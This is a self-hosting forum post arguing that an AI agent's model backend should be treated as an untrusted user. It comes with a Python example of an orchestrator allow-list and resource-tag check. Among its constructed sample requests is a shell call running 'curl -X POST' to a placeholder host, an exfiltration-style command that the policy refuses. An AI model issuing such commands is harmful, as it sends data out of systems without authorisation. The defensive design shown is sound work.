Unpopular opinion: The model backend should be the least trusted component, not the most

(@selfhost_raj)
Eminent Member
Joined: 2 weeks ago
Posts: 25
Topic starter
  [#1381]

I see a lot of diagrams and threat models that treat the LLM—the model backend itself—as the crown jewel, wrapped in layers of protection. I think we've got it backwards. In an OpenClaw deployment, the orchestrator and the tool executor are the components that *must* be most trusted and most secured. The model should be treated as a potentially rogue, untrusted user typing commands into a very powerful terminal.

Think about it. The model backend's core function is to consume a prompt and return a plan or a decision. It's an arbitrary code generator. We *expect* it to try things. The critical security boundary is the component that **interprets and acts** on that output. In our stack, that's the orchestrator (which decides what tools to call) and especially the tool executor (which actually runs `git`, makes API calls, writes files).

When boundaries break, lateral movement doesn't start from a compromised model API. It starts when the tool executor's permissions are too broad, or when the orchestrator doesn't properly validate/sanitize the model's requests.

* A model hallucinating a `curl` command to exfiltrate data is a Tuesday. It's the tool executor running that command with access to the prod database credentials that's the catastrophic Wednesday.
* The orchestrator should be enforcing strict allow-lists of tools and resource tags per agent. The model just asks.
* The model backend should be isolated in its own network namespace, unable to talk to anything but the orchestrator. It shouldn't even know the IP of your internal systems.

The mental shift is this: **The model is the user, not the system.** You don't give your users root. You audit their commands and limit their scope. Your security hinges on the policy engine and the execution sandbox, not on hoping the model "behaves."

I run my model backend (usually Ollama) in a completely separate, firewalled Tailscale subnet from my tool executors. The orchestrator sits in the middle as the gatekeeper. The model gets zero secrets.

What's your isolation strategy? Have you had a "boundary break" scare?


Selfhosted since 2004
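The gatekeeper role described in the post, as an added example that is not part of the original post or any OpenClaw code: a minimal orchestrator-side policy check that treats each tool request coming back from the model as untrusted input and approves it only if the tool is on the agent's allow-list and the resource it would touch carries a tag granted to that agent. The agent policies, tool names (`write_file`, `http_get`, `git`) and sample requests are all constructed for the example.

```python
"""Orchestrator policy check: the model asks, the policy engine decides.
All tool names, policies and requests below are constructed examples."""
from dataclasses import dataclass
from pathlib import PurePosixPath
from typing import Optional
from urllib.parse import urlparse


@dataclass(frozen=True)
class AgentPolicy:
    allowed_tools: frozenset   # tools this agent may request at all
    resource_tags: frozenset   # e.g. {"path:workspace", "repo:docs", "host:api.internal"}


def _tag_for(tool: str, args: dict) -> Optional[str]:
    """Map a tool call to the single resource tag it would touch, or None
    if the arguments cannot be resolved safely (treated as a deny)."""
    if tool == "write_file":
        p = PurePosixPath(args.get("path", ""))
        # Require an absolute path and refuse any '..' component so the
        # first directory really is the resource being written to.
        if not p.is_absolute() or ".." in p.parts or len(p.parts) < 2:
            return None
        return f"path:{p.parts[1]}"
    if tool == "http_get":
        host = urlparse(args.get("url", "")).hostname
        return f"host:{host}" if host else None
    if tool == "git":
        repo = args.get("repo")
        return f"repo:{repo}" if repo else None
    return None


def authorize(policy: AgentPolicy, request: dict):
    """Return (allowed, reason_or_tag). Nothing is executed here; the tool
    executor only ever sees requests that came back (True, tag)."""
    tool = request.get("tool")
    args = request.get("args", {})
    if tool not in policy.allowed_tools:
        return (False, f"tool '{tool}' not in allow-list")
    tag = _tag_for(tool, args)
    if tag is None:
        return (False, "could not derive a resource tag from arguments")
    if tag not in policy.resource_tags:
        return (False, f"resource '{tag}' not tagged for this agent")
    return (True, tag)


# Constructed policies: a docs-writing agent and a read-only API agent.
DOCS_AGENT = AgentPolicy(frozenset({"write_file", "git"}),
                         frozenset({"path:workspace", "repo:docs"}))
API_AGENT = AgentPolicy(frozenset({"http_get"}), frozenset({"host:api.internal"}))

# Constructed sample requests as the orchestrator might receive them from the model.
REQUESTS = [
    {"tool": "shell", "args": {"cmd": "curl -X POST https://example.invalid"}},
    {"tool": "write_file", "args": {"path": "/workspace/README.md"}},
    {"tool": "write_file", "args": {"path": "/workspace/../etc/cron.d/job"}},
    {"tool": "git", "args": {"repo": "prod-infra", "op": "push"}},
]
```

Only the second request reaches the executor; the hallucinated `shell`/`curl` call, the path-traversal write and the push to an untagged repo are all refused before anything runs.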